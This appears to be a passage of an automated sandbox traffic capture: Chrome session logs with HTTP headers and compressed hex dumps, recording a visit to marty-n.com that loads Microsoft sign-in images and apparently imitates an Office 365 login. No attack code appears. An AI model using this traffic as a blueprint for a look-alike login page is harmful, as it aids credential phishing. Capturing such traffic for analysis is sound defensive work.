                                                                                                              2024-10-25 20:23:35 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                                                              Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              34192.168.2.164974513.107.246.454431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:35 UTC669OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                                                                              Host: aadcdn.msauth.net
                                                                                                              Connection: keep-alive
                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: image
                                                                                                              Referer: https://marty-n.com/
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:35 UTC779INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:35 GMT
                                                                                                              Content-Type: image/svg+xml
                                                                                                              Content-Length: 2407
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                              Content-Encoding: gzip
                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                                                              ETag: 0x8DB5C3F499A9B99
                                                                                                              x-ms-request-id: 95332588-d01e-0054-2124-22b3ac000000
                                                                                                              x-ms-version: 2009-09-19
                                                                                                              x-ms-lease-status: unlocked
                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              x-azure-ref: 20241025T202335Z-16849878b785dznd7xpawq9gcn00000002g0000000002ucq
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-10-25 20:23:35 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                                                                                              Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              35192.168.2.164974713.107.246.454431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:35 UTC652OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                                                                                              Host: aadcdn.msauth.net
                                                                                                              Connection: keep-alive
                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: image
                                                                                                              Referer: https://marty-n.com/
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:35 UTC799INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:35 GMT
                                                                                                              Content-Type: image/svg+xml
                                                                                                              Content-Length: 199
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                              Content-Encoding: gzip
                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                                                              ETag: 0x8DB5C3F49C21D98
                                                                                                              x-ms-request-id: 68cfccad-301e-0060-296f-26bfc9000000
                                                                                                              x-ms-version: 2009-09-19
                                                                                                              x-ms-lease-status: unlocked
                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              x-azure-ref: 20241025T202335Z-16849878b78rjhv97f3nhawr7s00000009s00000000023u9
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              X-Cache-Info: L1_T2
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-10-25 20:23:35 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                                                                                              Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              36192.168.2.164974413.107.246.454431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:35 UTC648OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                              Host: aadcdn.msauth.net
                                                                                                              Connection: keep-alive
                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: image
                                                                                                              Referer: https://marty-n.com/
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:36 UTC778INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:35 GMT
                                                                                                              Content-Type: image/svg+xml
                                                                                                              Content-Length: 673
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                              Content-Encoding: gzip
                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                                                                                              ETag: 0x8DB5C3F47E260FD
                                                                                                              x-ms-request-id: c9c40271-601e-006d-06aa-26771d000000
                                                                                                              x-ms-version: 2009-09-19
                                                                                                              x-ms-lease-status: unlocked
                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              x-azure-ref: 20241025T202335Z-16849878b787sbpl0sv29sm89s00000009u000000000ane4
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-10-25 20:23:36 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                                                              Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              37192.168.2.1649752185.45.66.1554431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:35 UTC653OUTGET /favicon.ico HTTP/1.1
                                                                                                              Host: marty-n.com
                                                                                                              Connection: keep-alive
                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: image
                                                                                                              Referer: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:36 UTC270INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:36 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 11 Mar 2019 11:56:00 GMT
                                                                                                              ETag: "73b00d6-47e-583d04191d035"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 1150
                                                                                                              Content-Type: image/x-icon
                                                                                                              2024-10-25 20:23:36 UTC1150INData Raw: 00 00 01 00 01 00 10 10 00 00 01 00 20 00 68 04 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: h(


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              38192.168.2.1649749152.199.21.1754431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:35 UTC655OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                                                                              Host: aadcdn.msftauth.net
                                                                                                              Connection: keep-alive
                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: image
                                                                                                              Referer: https://marty-n.com/
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:36 UTC738INHTTP/1.1 200 OK
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                              Age: 18542987
                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                              Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                                                                              Content-Type: image/svg+xml
                                                                                                              Date: Fri, 25 Oct 2024 20:23:35 GMT
                                                                                                              Etag: 0x8DB5C3F4AC59B47
                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                                                                              Server: ECAcc (lhc/78BB)
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Cache: HIT
                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                              x-ms-lease-status: unlocked
                                                                                                              x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                                                                              x-ms-version: 2009-09-19
                                                                                                              Content-Length: 1636
                                                                                                              Connection: close
                                                                                                              2024-10-25 20:23:36 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              39192.168.2.1649742192.229.133.2214431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:35 UTC540OUTGET /w3css/4/w3.css HTTP/1.1
                                                                                                              Host: www.w3schools.com
                                                                                                              Connection: keep-alive
                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: style
                                                                                                              Referer: https://marty-n.com/
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:36 UTC581INHTTP/1.1 200 OK
                                                                                                              Age: 300697
                                                                                                              Cache-Control: public,max-age=31536000,public
                                                                                                              Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                                                                              Content-Type: text/css
                                                                                                              Date: Fri, 25 Oct 2024 20:23:35 GMT
                                                                                                              Etag: "0a29a965824db1:0+gzip+ident"
                                                                                                              Last-Modified: Tue, 22 Oct 2024 08:01:24 GMT
                                                                                                              Server: ECS (lhd/35B3)
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Cache: HIT
                                                                                                              X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                                                                              X-Powered-By: ASP.NET
                                                                                                              Content-Length: 23427
                                                                                                              Connection: close
                                                                                                              2024-10-25 20:23:36 UTC16383INData Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62
                                                                                                              Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
                                                                                                              2024-10-25 20:23:36 UTC7044INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23
                                                                                                              Data Ascii: !important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              40192.168.2.164975420.236.24.53443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:35 UTC493OUTGET /apc/trans.gif?42ef467e5f582ca56847c0384416bf70 HTTP/1.1
                                                                                                              Origin: https://www.bing.com
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept: */*
                                                                                                              Accept-Language: en-CH
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: mwh06prdapp02-canary-opaph.netmon.azure.com
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-10-25 20:23:36 UTC571INHTTP/1.1 200 OK
                                                                                                              Content-Type: image/gif
                                                                                                              Last-Modified: Tue, 17 Sep 2024 21:36:08 GMT
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "3ea699b499db1:0"
                                                                                                              Server: Microsoft-IIS/10.0
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Expose-Headers: X-UserHostAddress, X-EndPoint, X-FrontEnd, X-MachineName
                                                                                                              X-EndPoint: mwh06prdapp02
                                                                                                              X-MachineName: mwh06app022
                                                                                                              X-UserHostAddress: 173.254.250.0
                                                                                                              X-Powered-By: ASP.NET
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                              Date: Fri, 25 Oct 2024 20:23:35 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 43
                                                                                                              2024-10-25 20:23:36 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                              Data Ascii: GIF89a!,D;


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              41192.168.2.164975513.107.246.454431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:36 UTC416OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                                                              Host: logincdn.msauth.net
                                                                                                              Connection: keep-alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept: */*
                                                                                                              Sec-Fetch-Site: none
                                                                                                              Sec-Fetch-Mode: cors
                                                                                                              Sec-Fetch-Dest: empty
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:36 UTC799INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:36 GMT
                                                                                                              Content-Type: image/svg+xml
                                                                                                              Content-Length: 276
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                              Content-Encoding: gzip
                                                                                                              Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                                                                                              ETag: 0x8D79ED35591CF44
                                                                                                              x-ms-request-id: 1b5f1178-f01e-0058-66d4-266cb6000000
                                                                                                              x-ms-version: 2009-09-19
                                                                                                              x-ms-lease-status: unlocked
                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              x-azure-ref: 20241025T202336Z-16849878b78wc6ln1zsrz6q9w800000000m000000000x9qa
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache-Info: L1_T2
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
